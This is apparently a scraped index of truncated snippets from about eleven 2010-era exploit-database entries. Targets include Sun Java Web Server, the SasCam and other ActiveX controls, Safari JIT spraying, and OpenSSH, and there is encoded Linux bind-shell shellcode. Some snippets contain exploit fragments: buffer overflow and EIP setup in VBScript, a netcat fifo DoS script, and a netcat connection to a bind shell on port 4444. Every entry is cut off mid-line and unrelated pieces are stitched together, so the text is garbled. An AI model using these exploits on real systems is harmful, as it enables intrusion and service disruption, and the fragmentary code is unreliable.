# Sun Java Web Sever 7.0 u7 Admin Interface DOS # Software Package sjsws-7_0u7-windows-i586.zip 4fb8d1fb700d5649234a2891a4ecedea # While attempting to verify http://www.exploit-db.com/exploits/14194/ (which was not verified), # I stumbled across sem
/* Title : bind port to 6678 XOR encoded polymorphic linux shellcode . Name : 125 bind port to 6678 XOR encoded polymorphic linux shellcode . Date : Tue Jul 6 01:52:33 WIT 2010 Author : gunslinger_ yudha.gunslinger[at]gmail.com Web : http://devilzc0
!-- JIT-SPRAY for Safari 4.0.5 - 5.0.0 JavaScript JIT SHELLCODE and spray for ASLR / DEP bypass (Win x32) By Alexey Sintsov from Digital Security Research Group Special for Hack In The Box 2010 Amsterdam PAYLOAD - exec calc Tested on Windows7 and Wi
/* Author : gunslinger_ yudha.gunslinger[at]gmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com)
/* Author : gunslinger_ yudha.gunslinger[at]gmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com)
/* Author : gunslinger_ yudha.gunslinger[at]gmail.com Web : http://devilzc0de.org blog : http://gunslingerc0de.wordpress.com tested on : linux debian special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com)
# Exploit Title: SasCam 2.7 ActiveX Head Buffer Overflow # Date: July 4, 2010 # Author: Blake # Software Link:http://download.cnet.com/SasCam-Webcam-Server/3000-2348_4-10491197.html # Version: 2.7 # Tested on: Windows XP SP3 / IE6 and 7 html object
#!/bin/bash## OpenSSH attack detection DoS PoC.# Thanks to Tavis Ormand# Greets to Inj3ct0r Cr3w## usage: script hostname# victim hostnamehostname=${1:-localhost}port=${2:-22}# where the fifo is created to communicate with netcatfifo=/tmp/nc.$# make
# Tested on: Windows XP SP3 IE6/7 html object classid='clsid:6D5B4E71-625F-11D2-B3AE-00A0C932C7DF' id='target'/object script language='vbscript' ' Registry OCX Remote Buffer Overflow ' Written by Blake buffer = String(2008, A) eip = unescape(%f3%30%
html object classid='clsid:0297D24A-F425-47EE-9F3B-A459BCE593E3' id='target'/object script language = 'vbscript' 'SEH Overwrite exploited by Blake 'Original EIP method by callAX 'Tested on XP SP3/IE7 in virtualbox '$ nc 192.168.1.155 4444 'Microsoft
/* Sun Java Web Server Exploit * Tested on: * Sun Java Web Server 7.0 update 7 - XP SP3 * Ref: CVE-2010-0361 * This vulnerability was identified by Evgeny Legerov * * Author: Dominic Chell dmc@deadbeef.co.uk * Date: 23/01/2010 */ #include stdafx.h #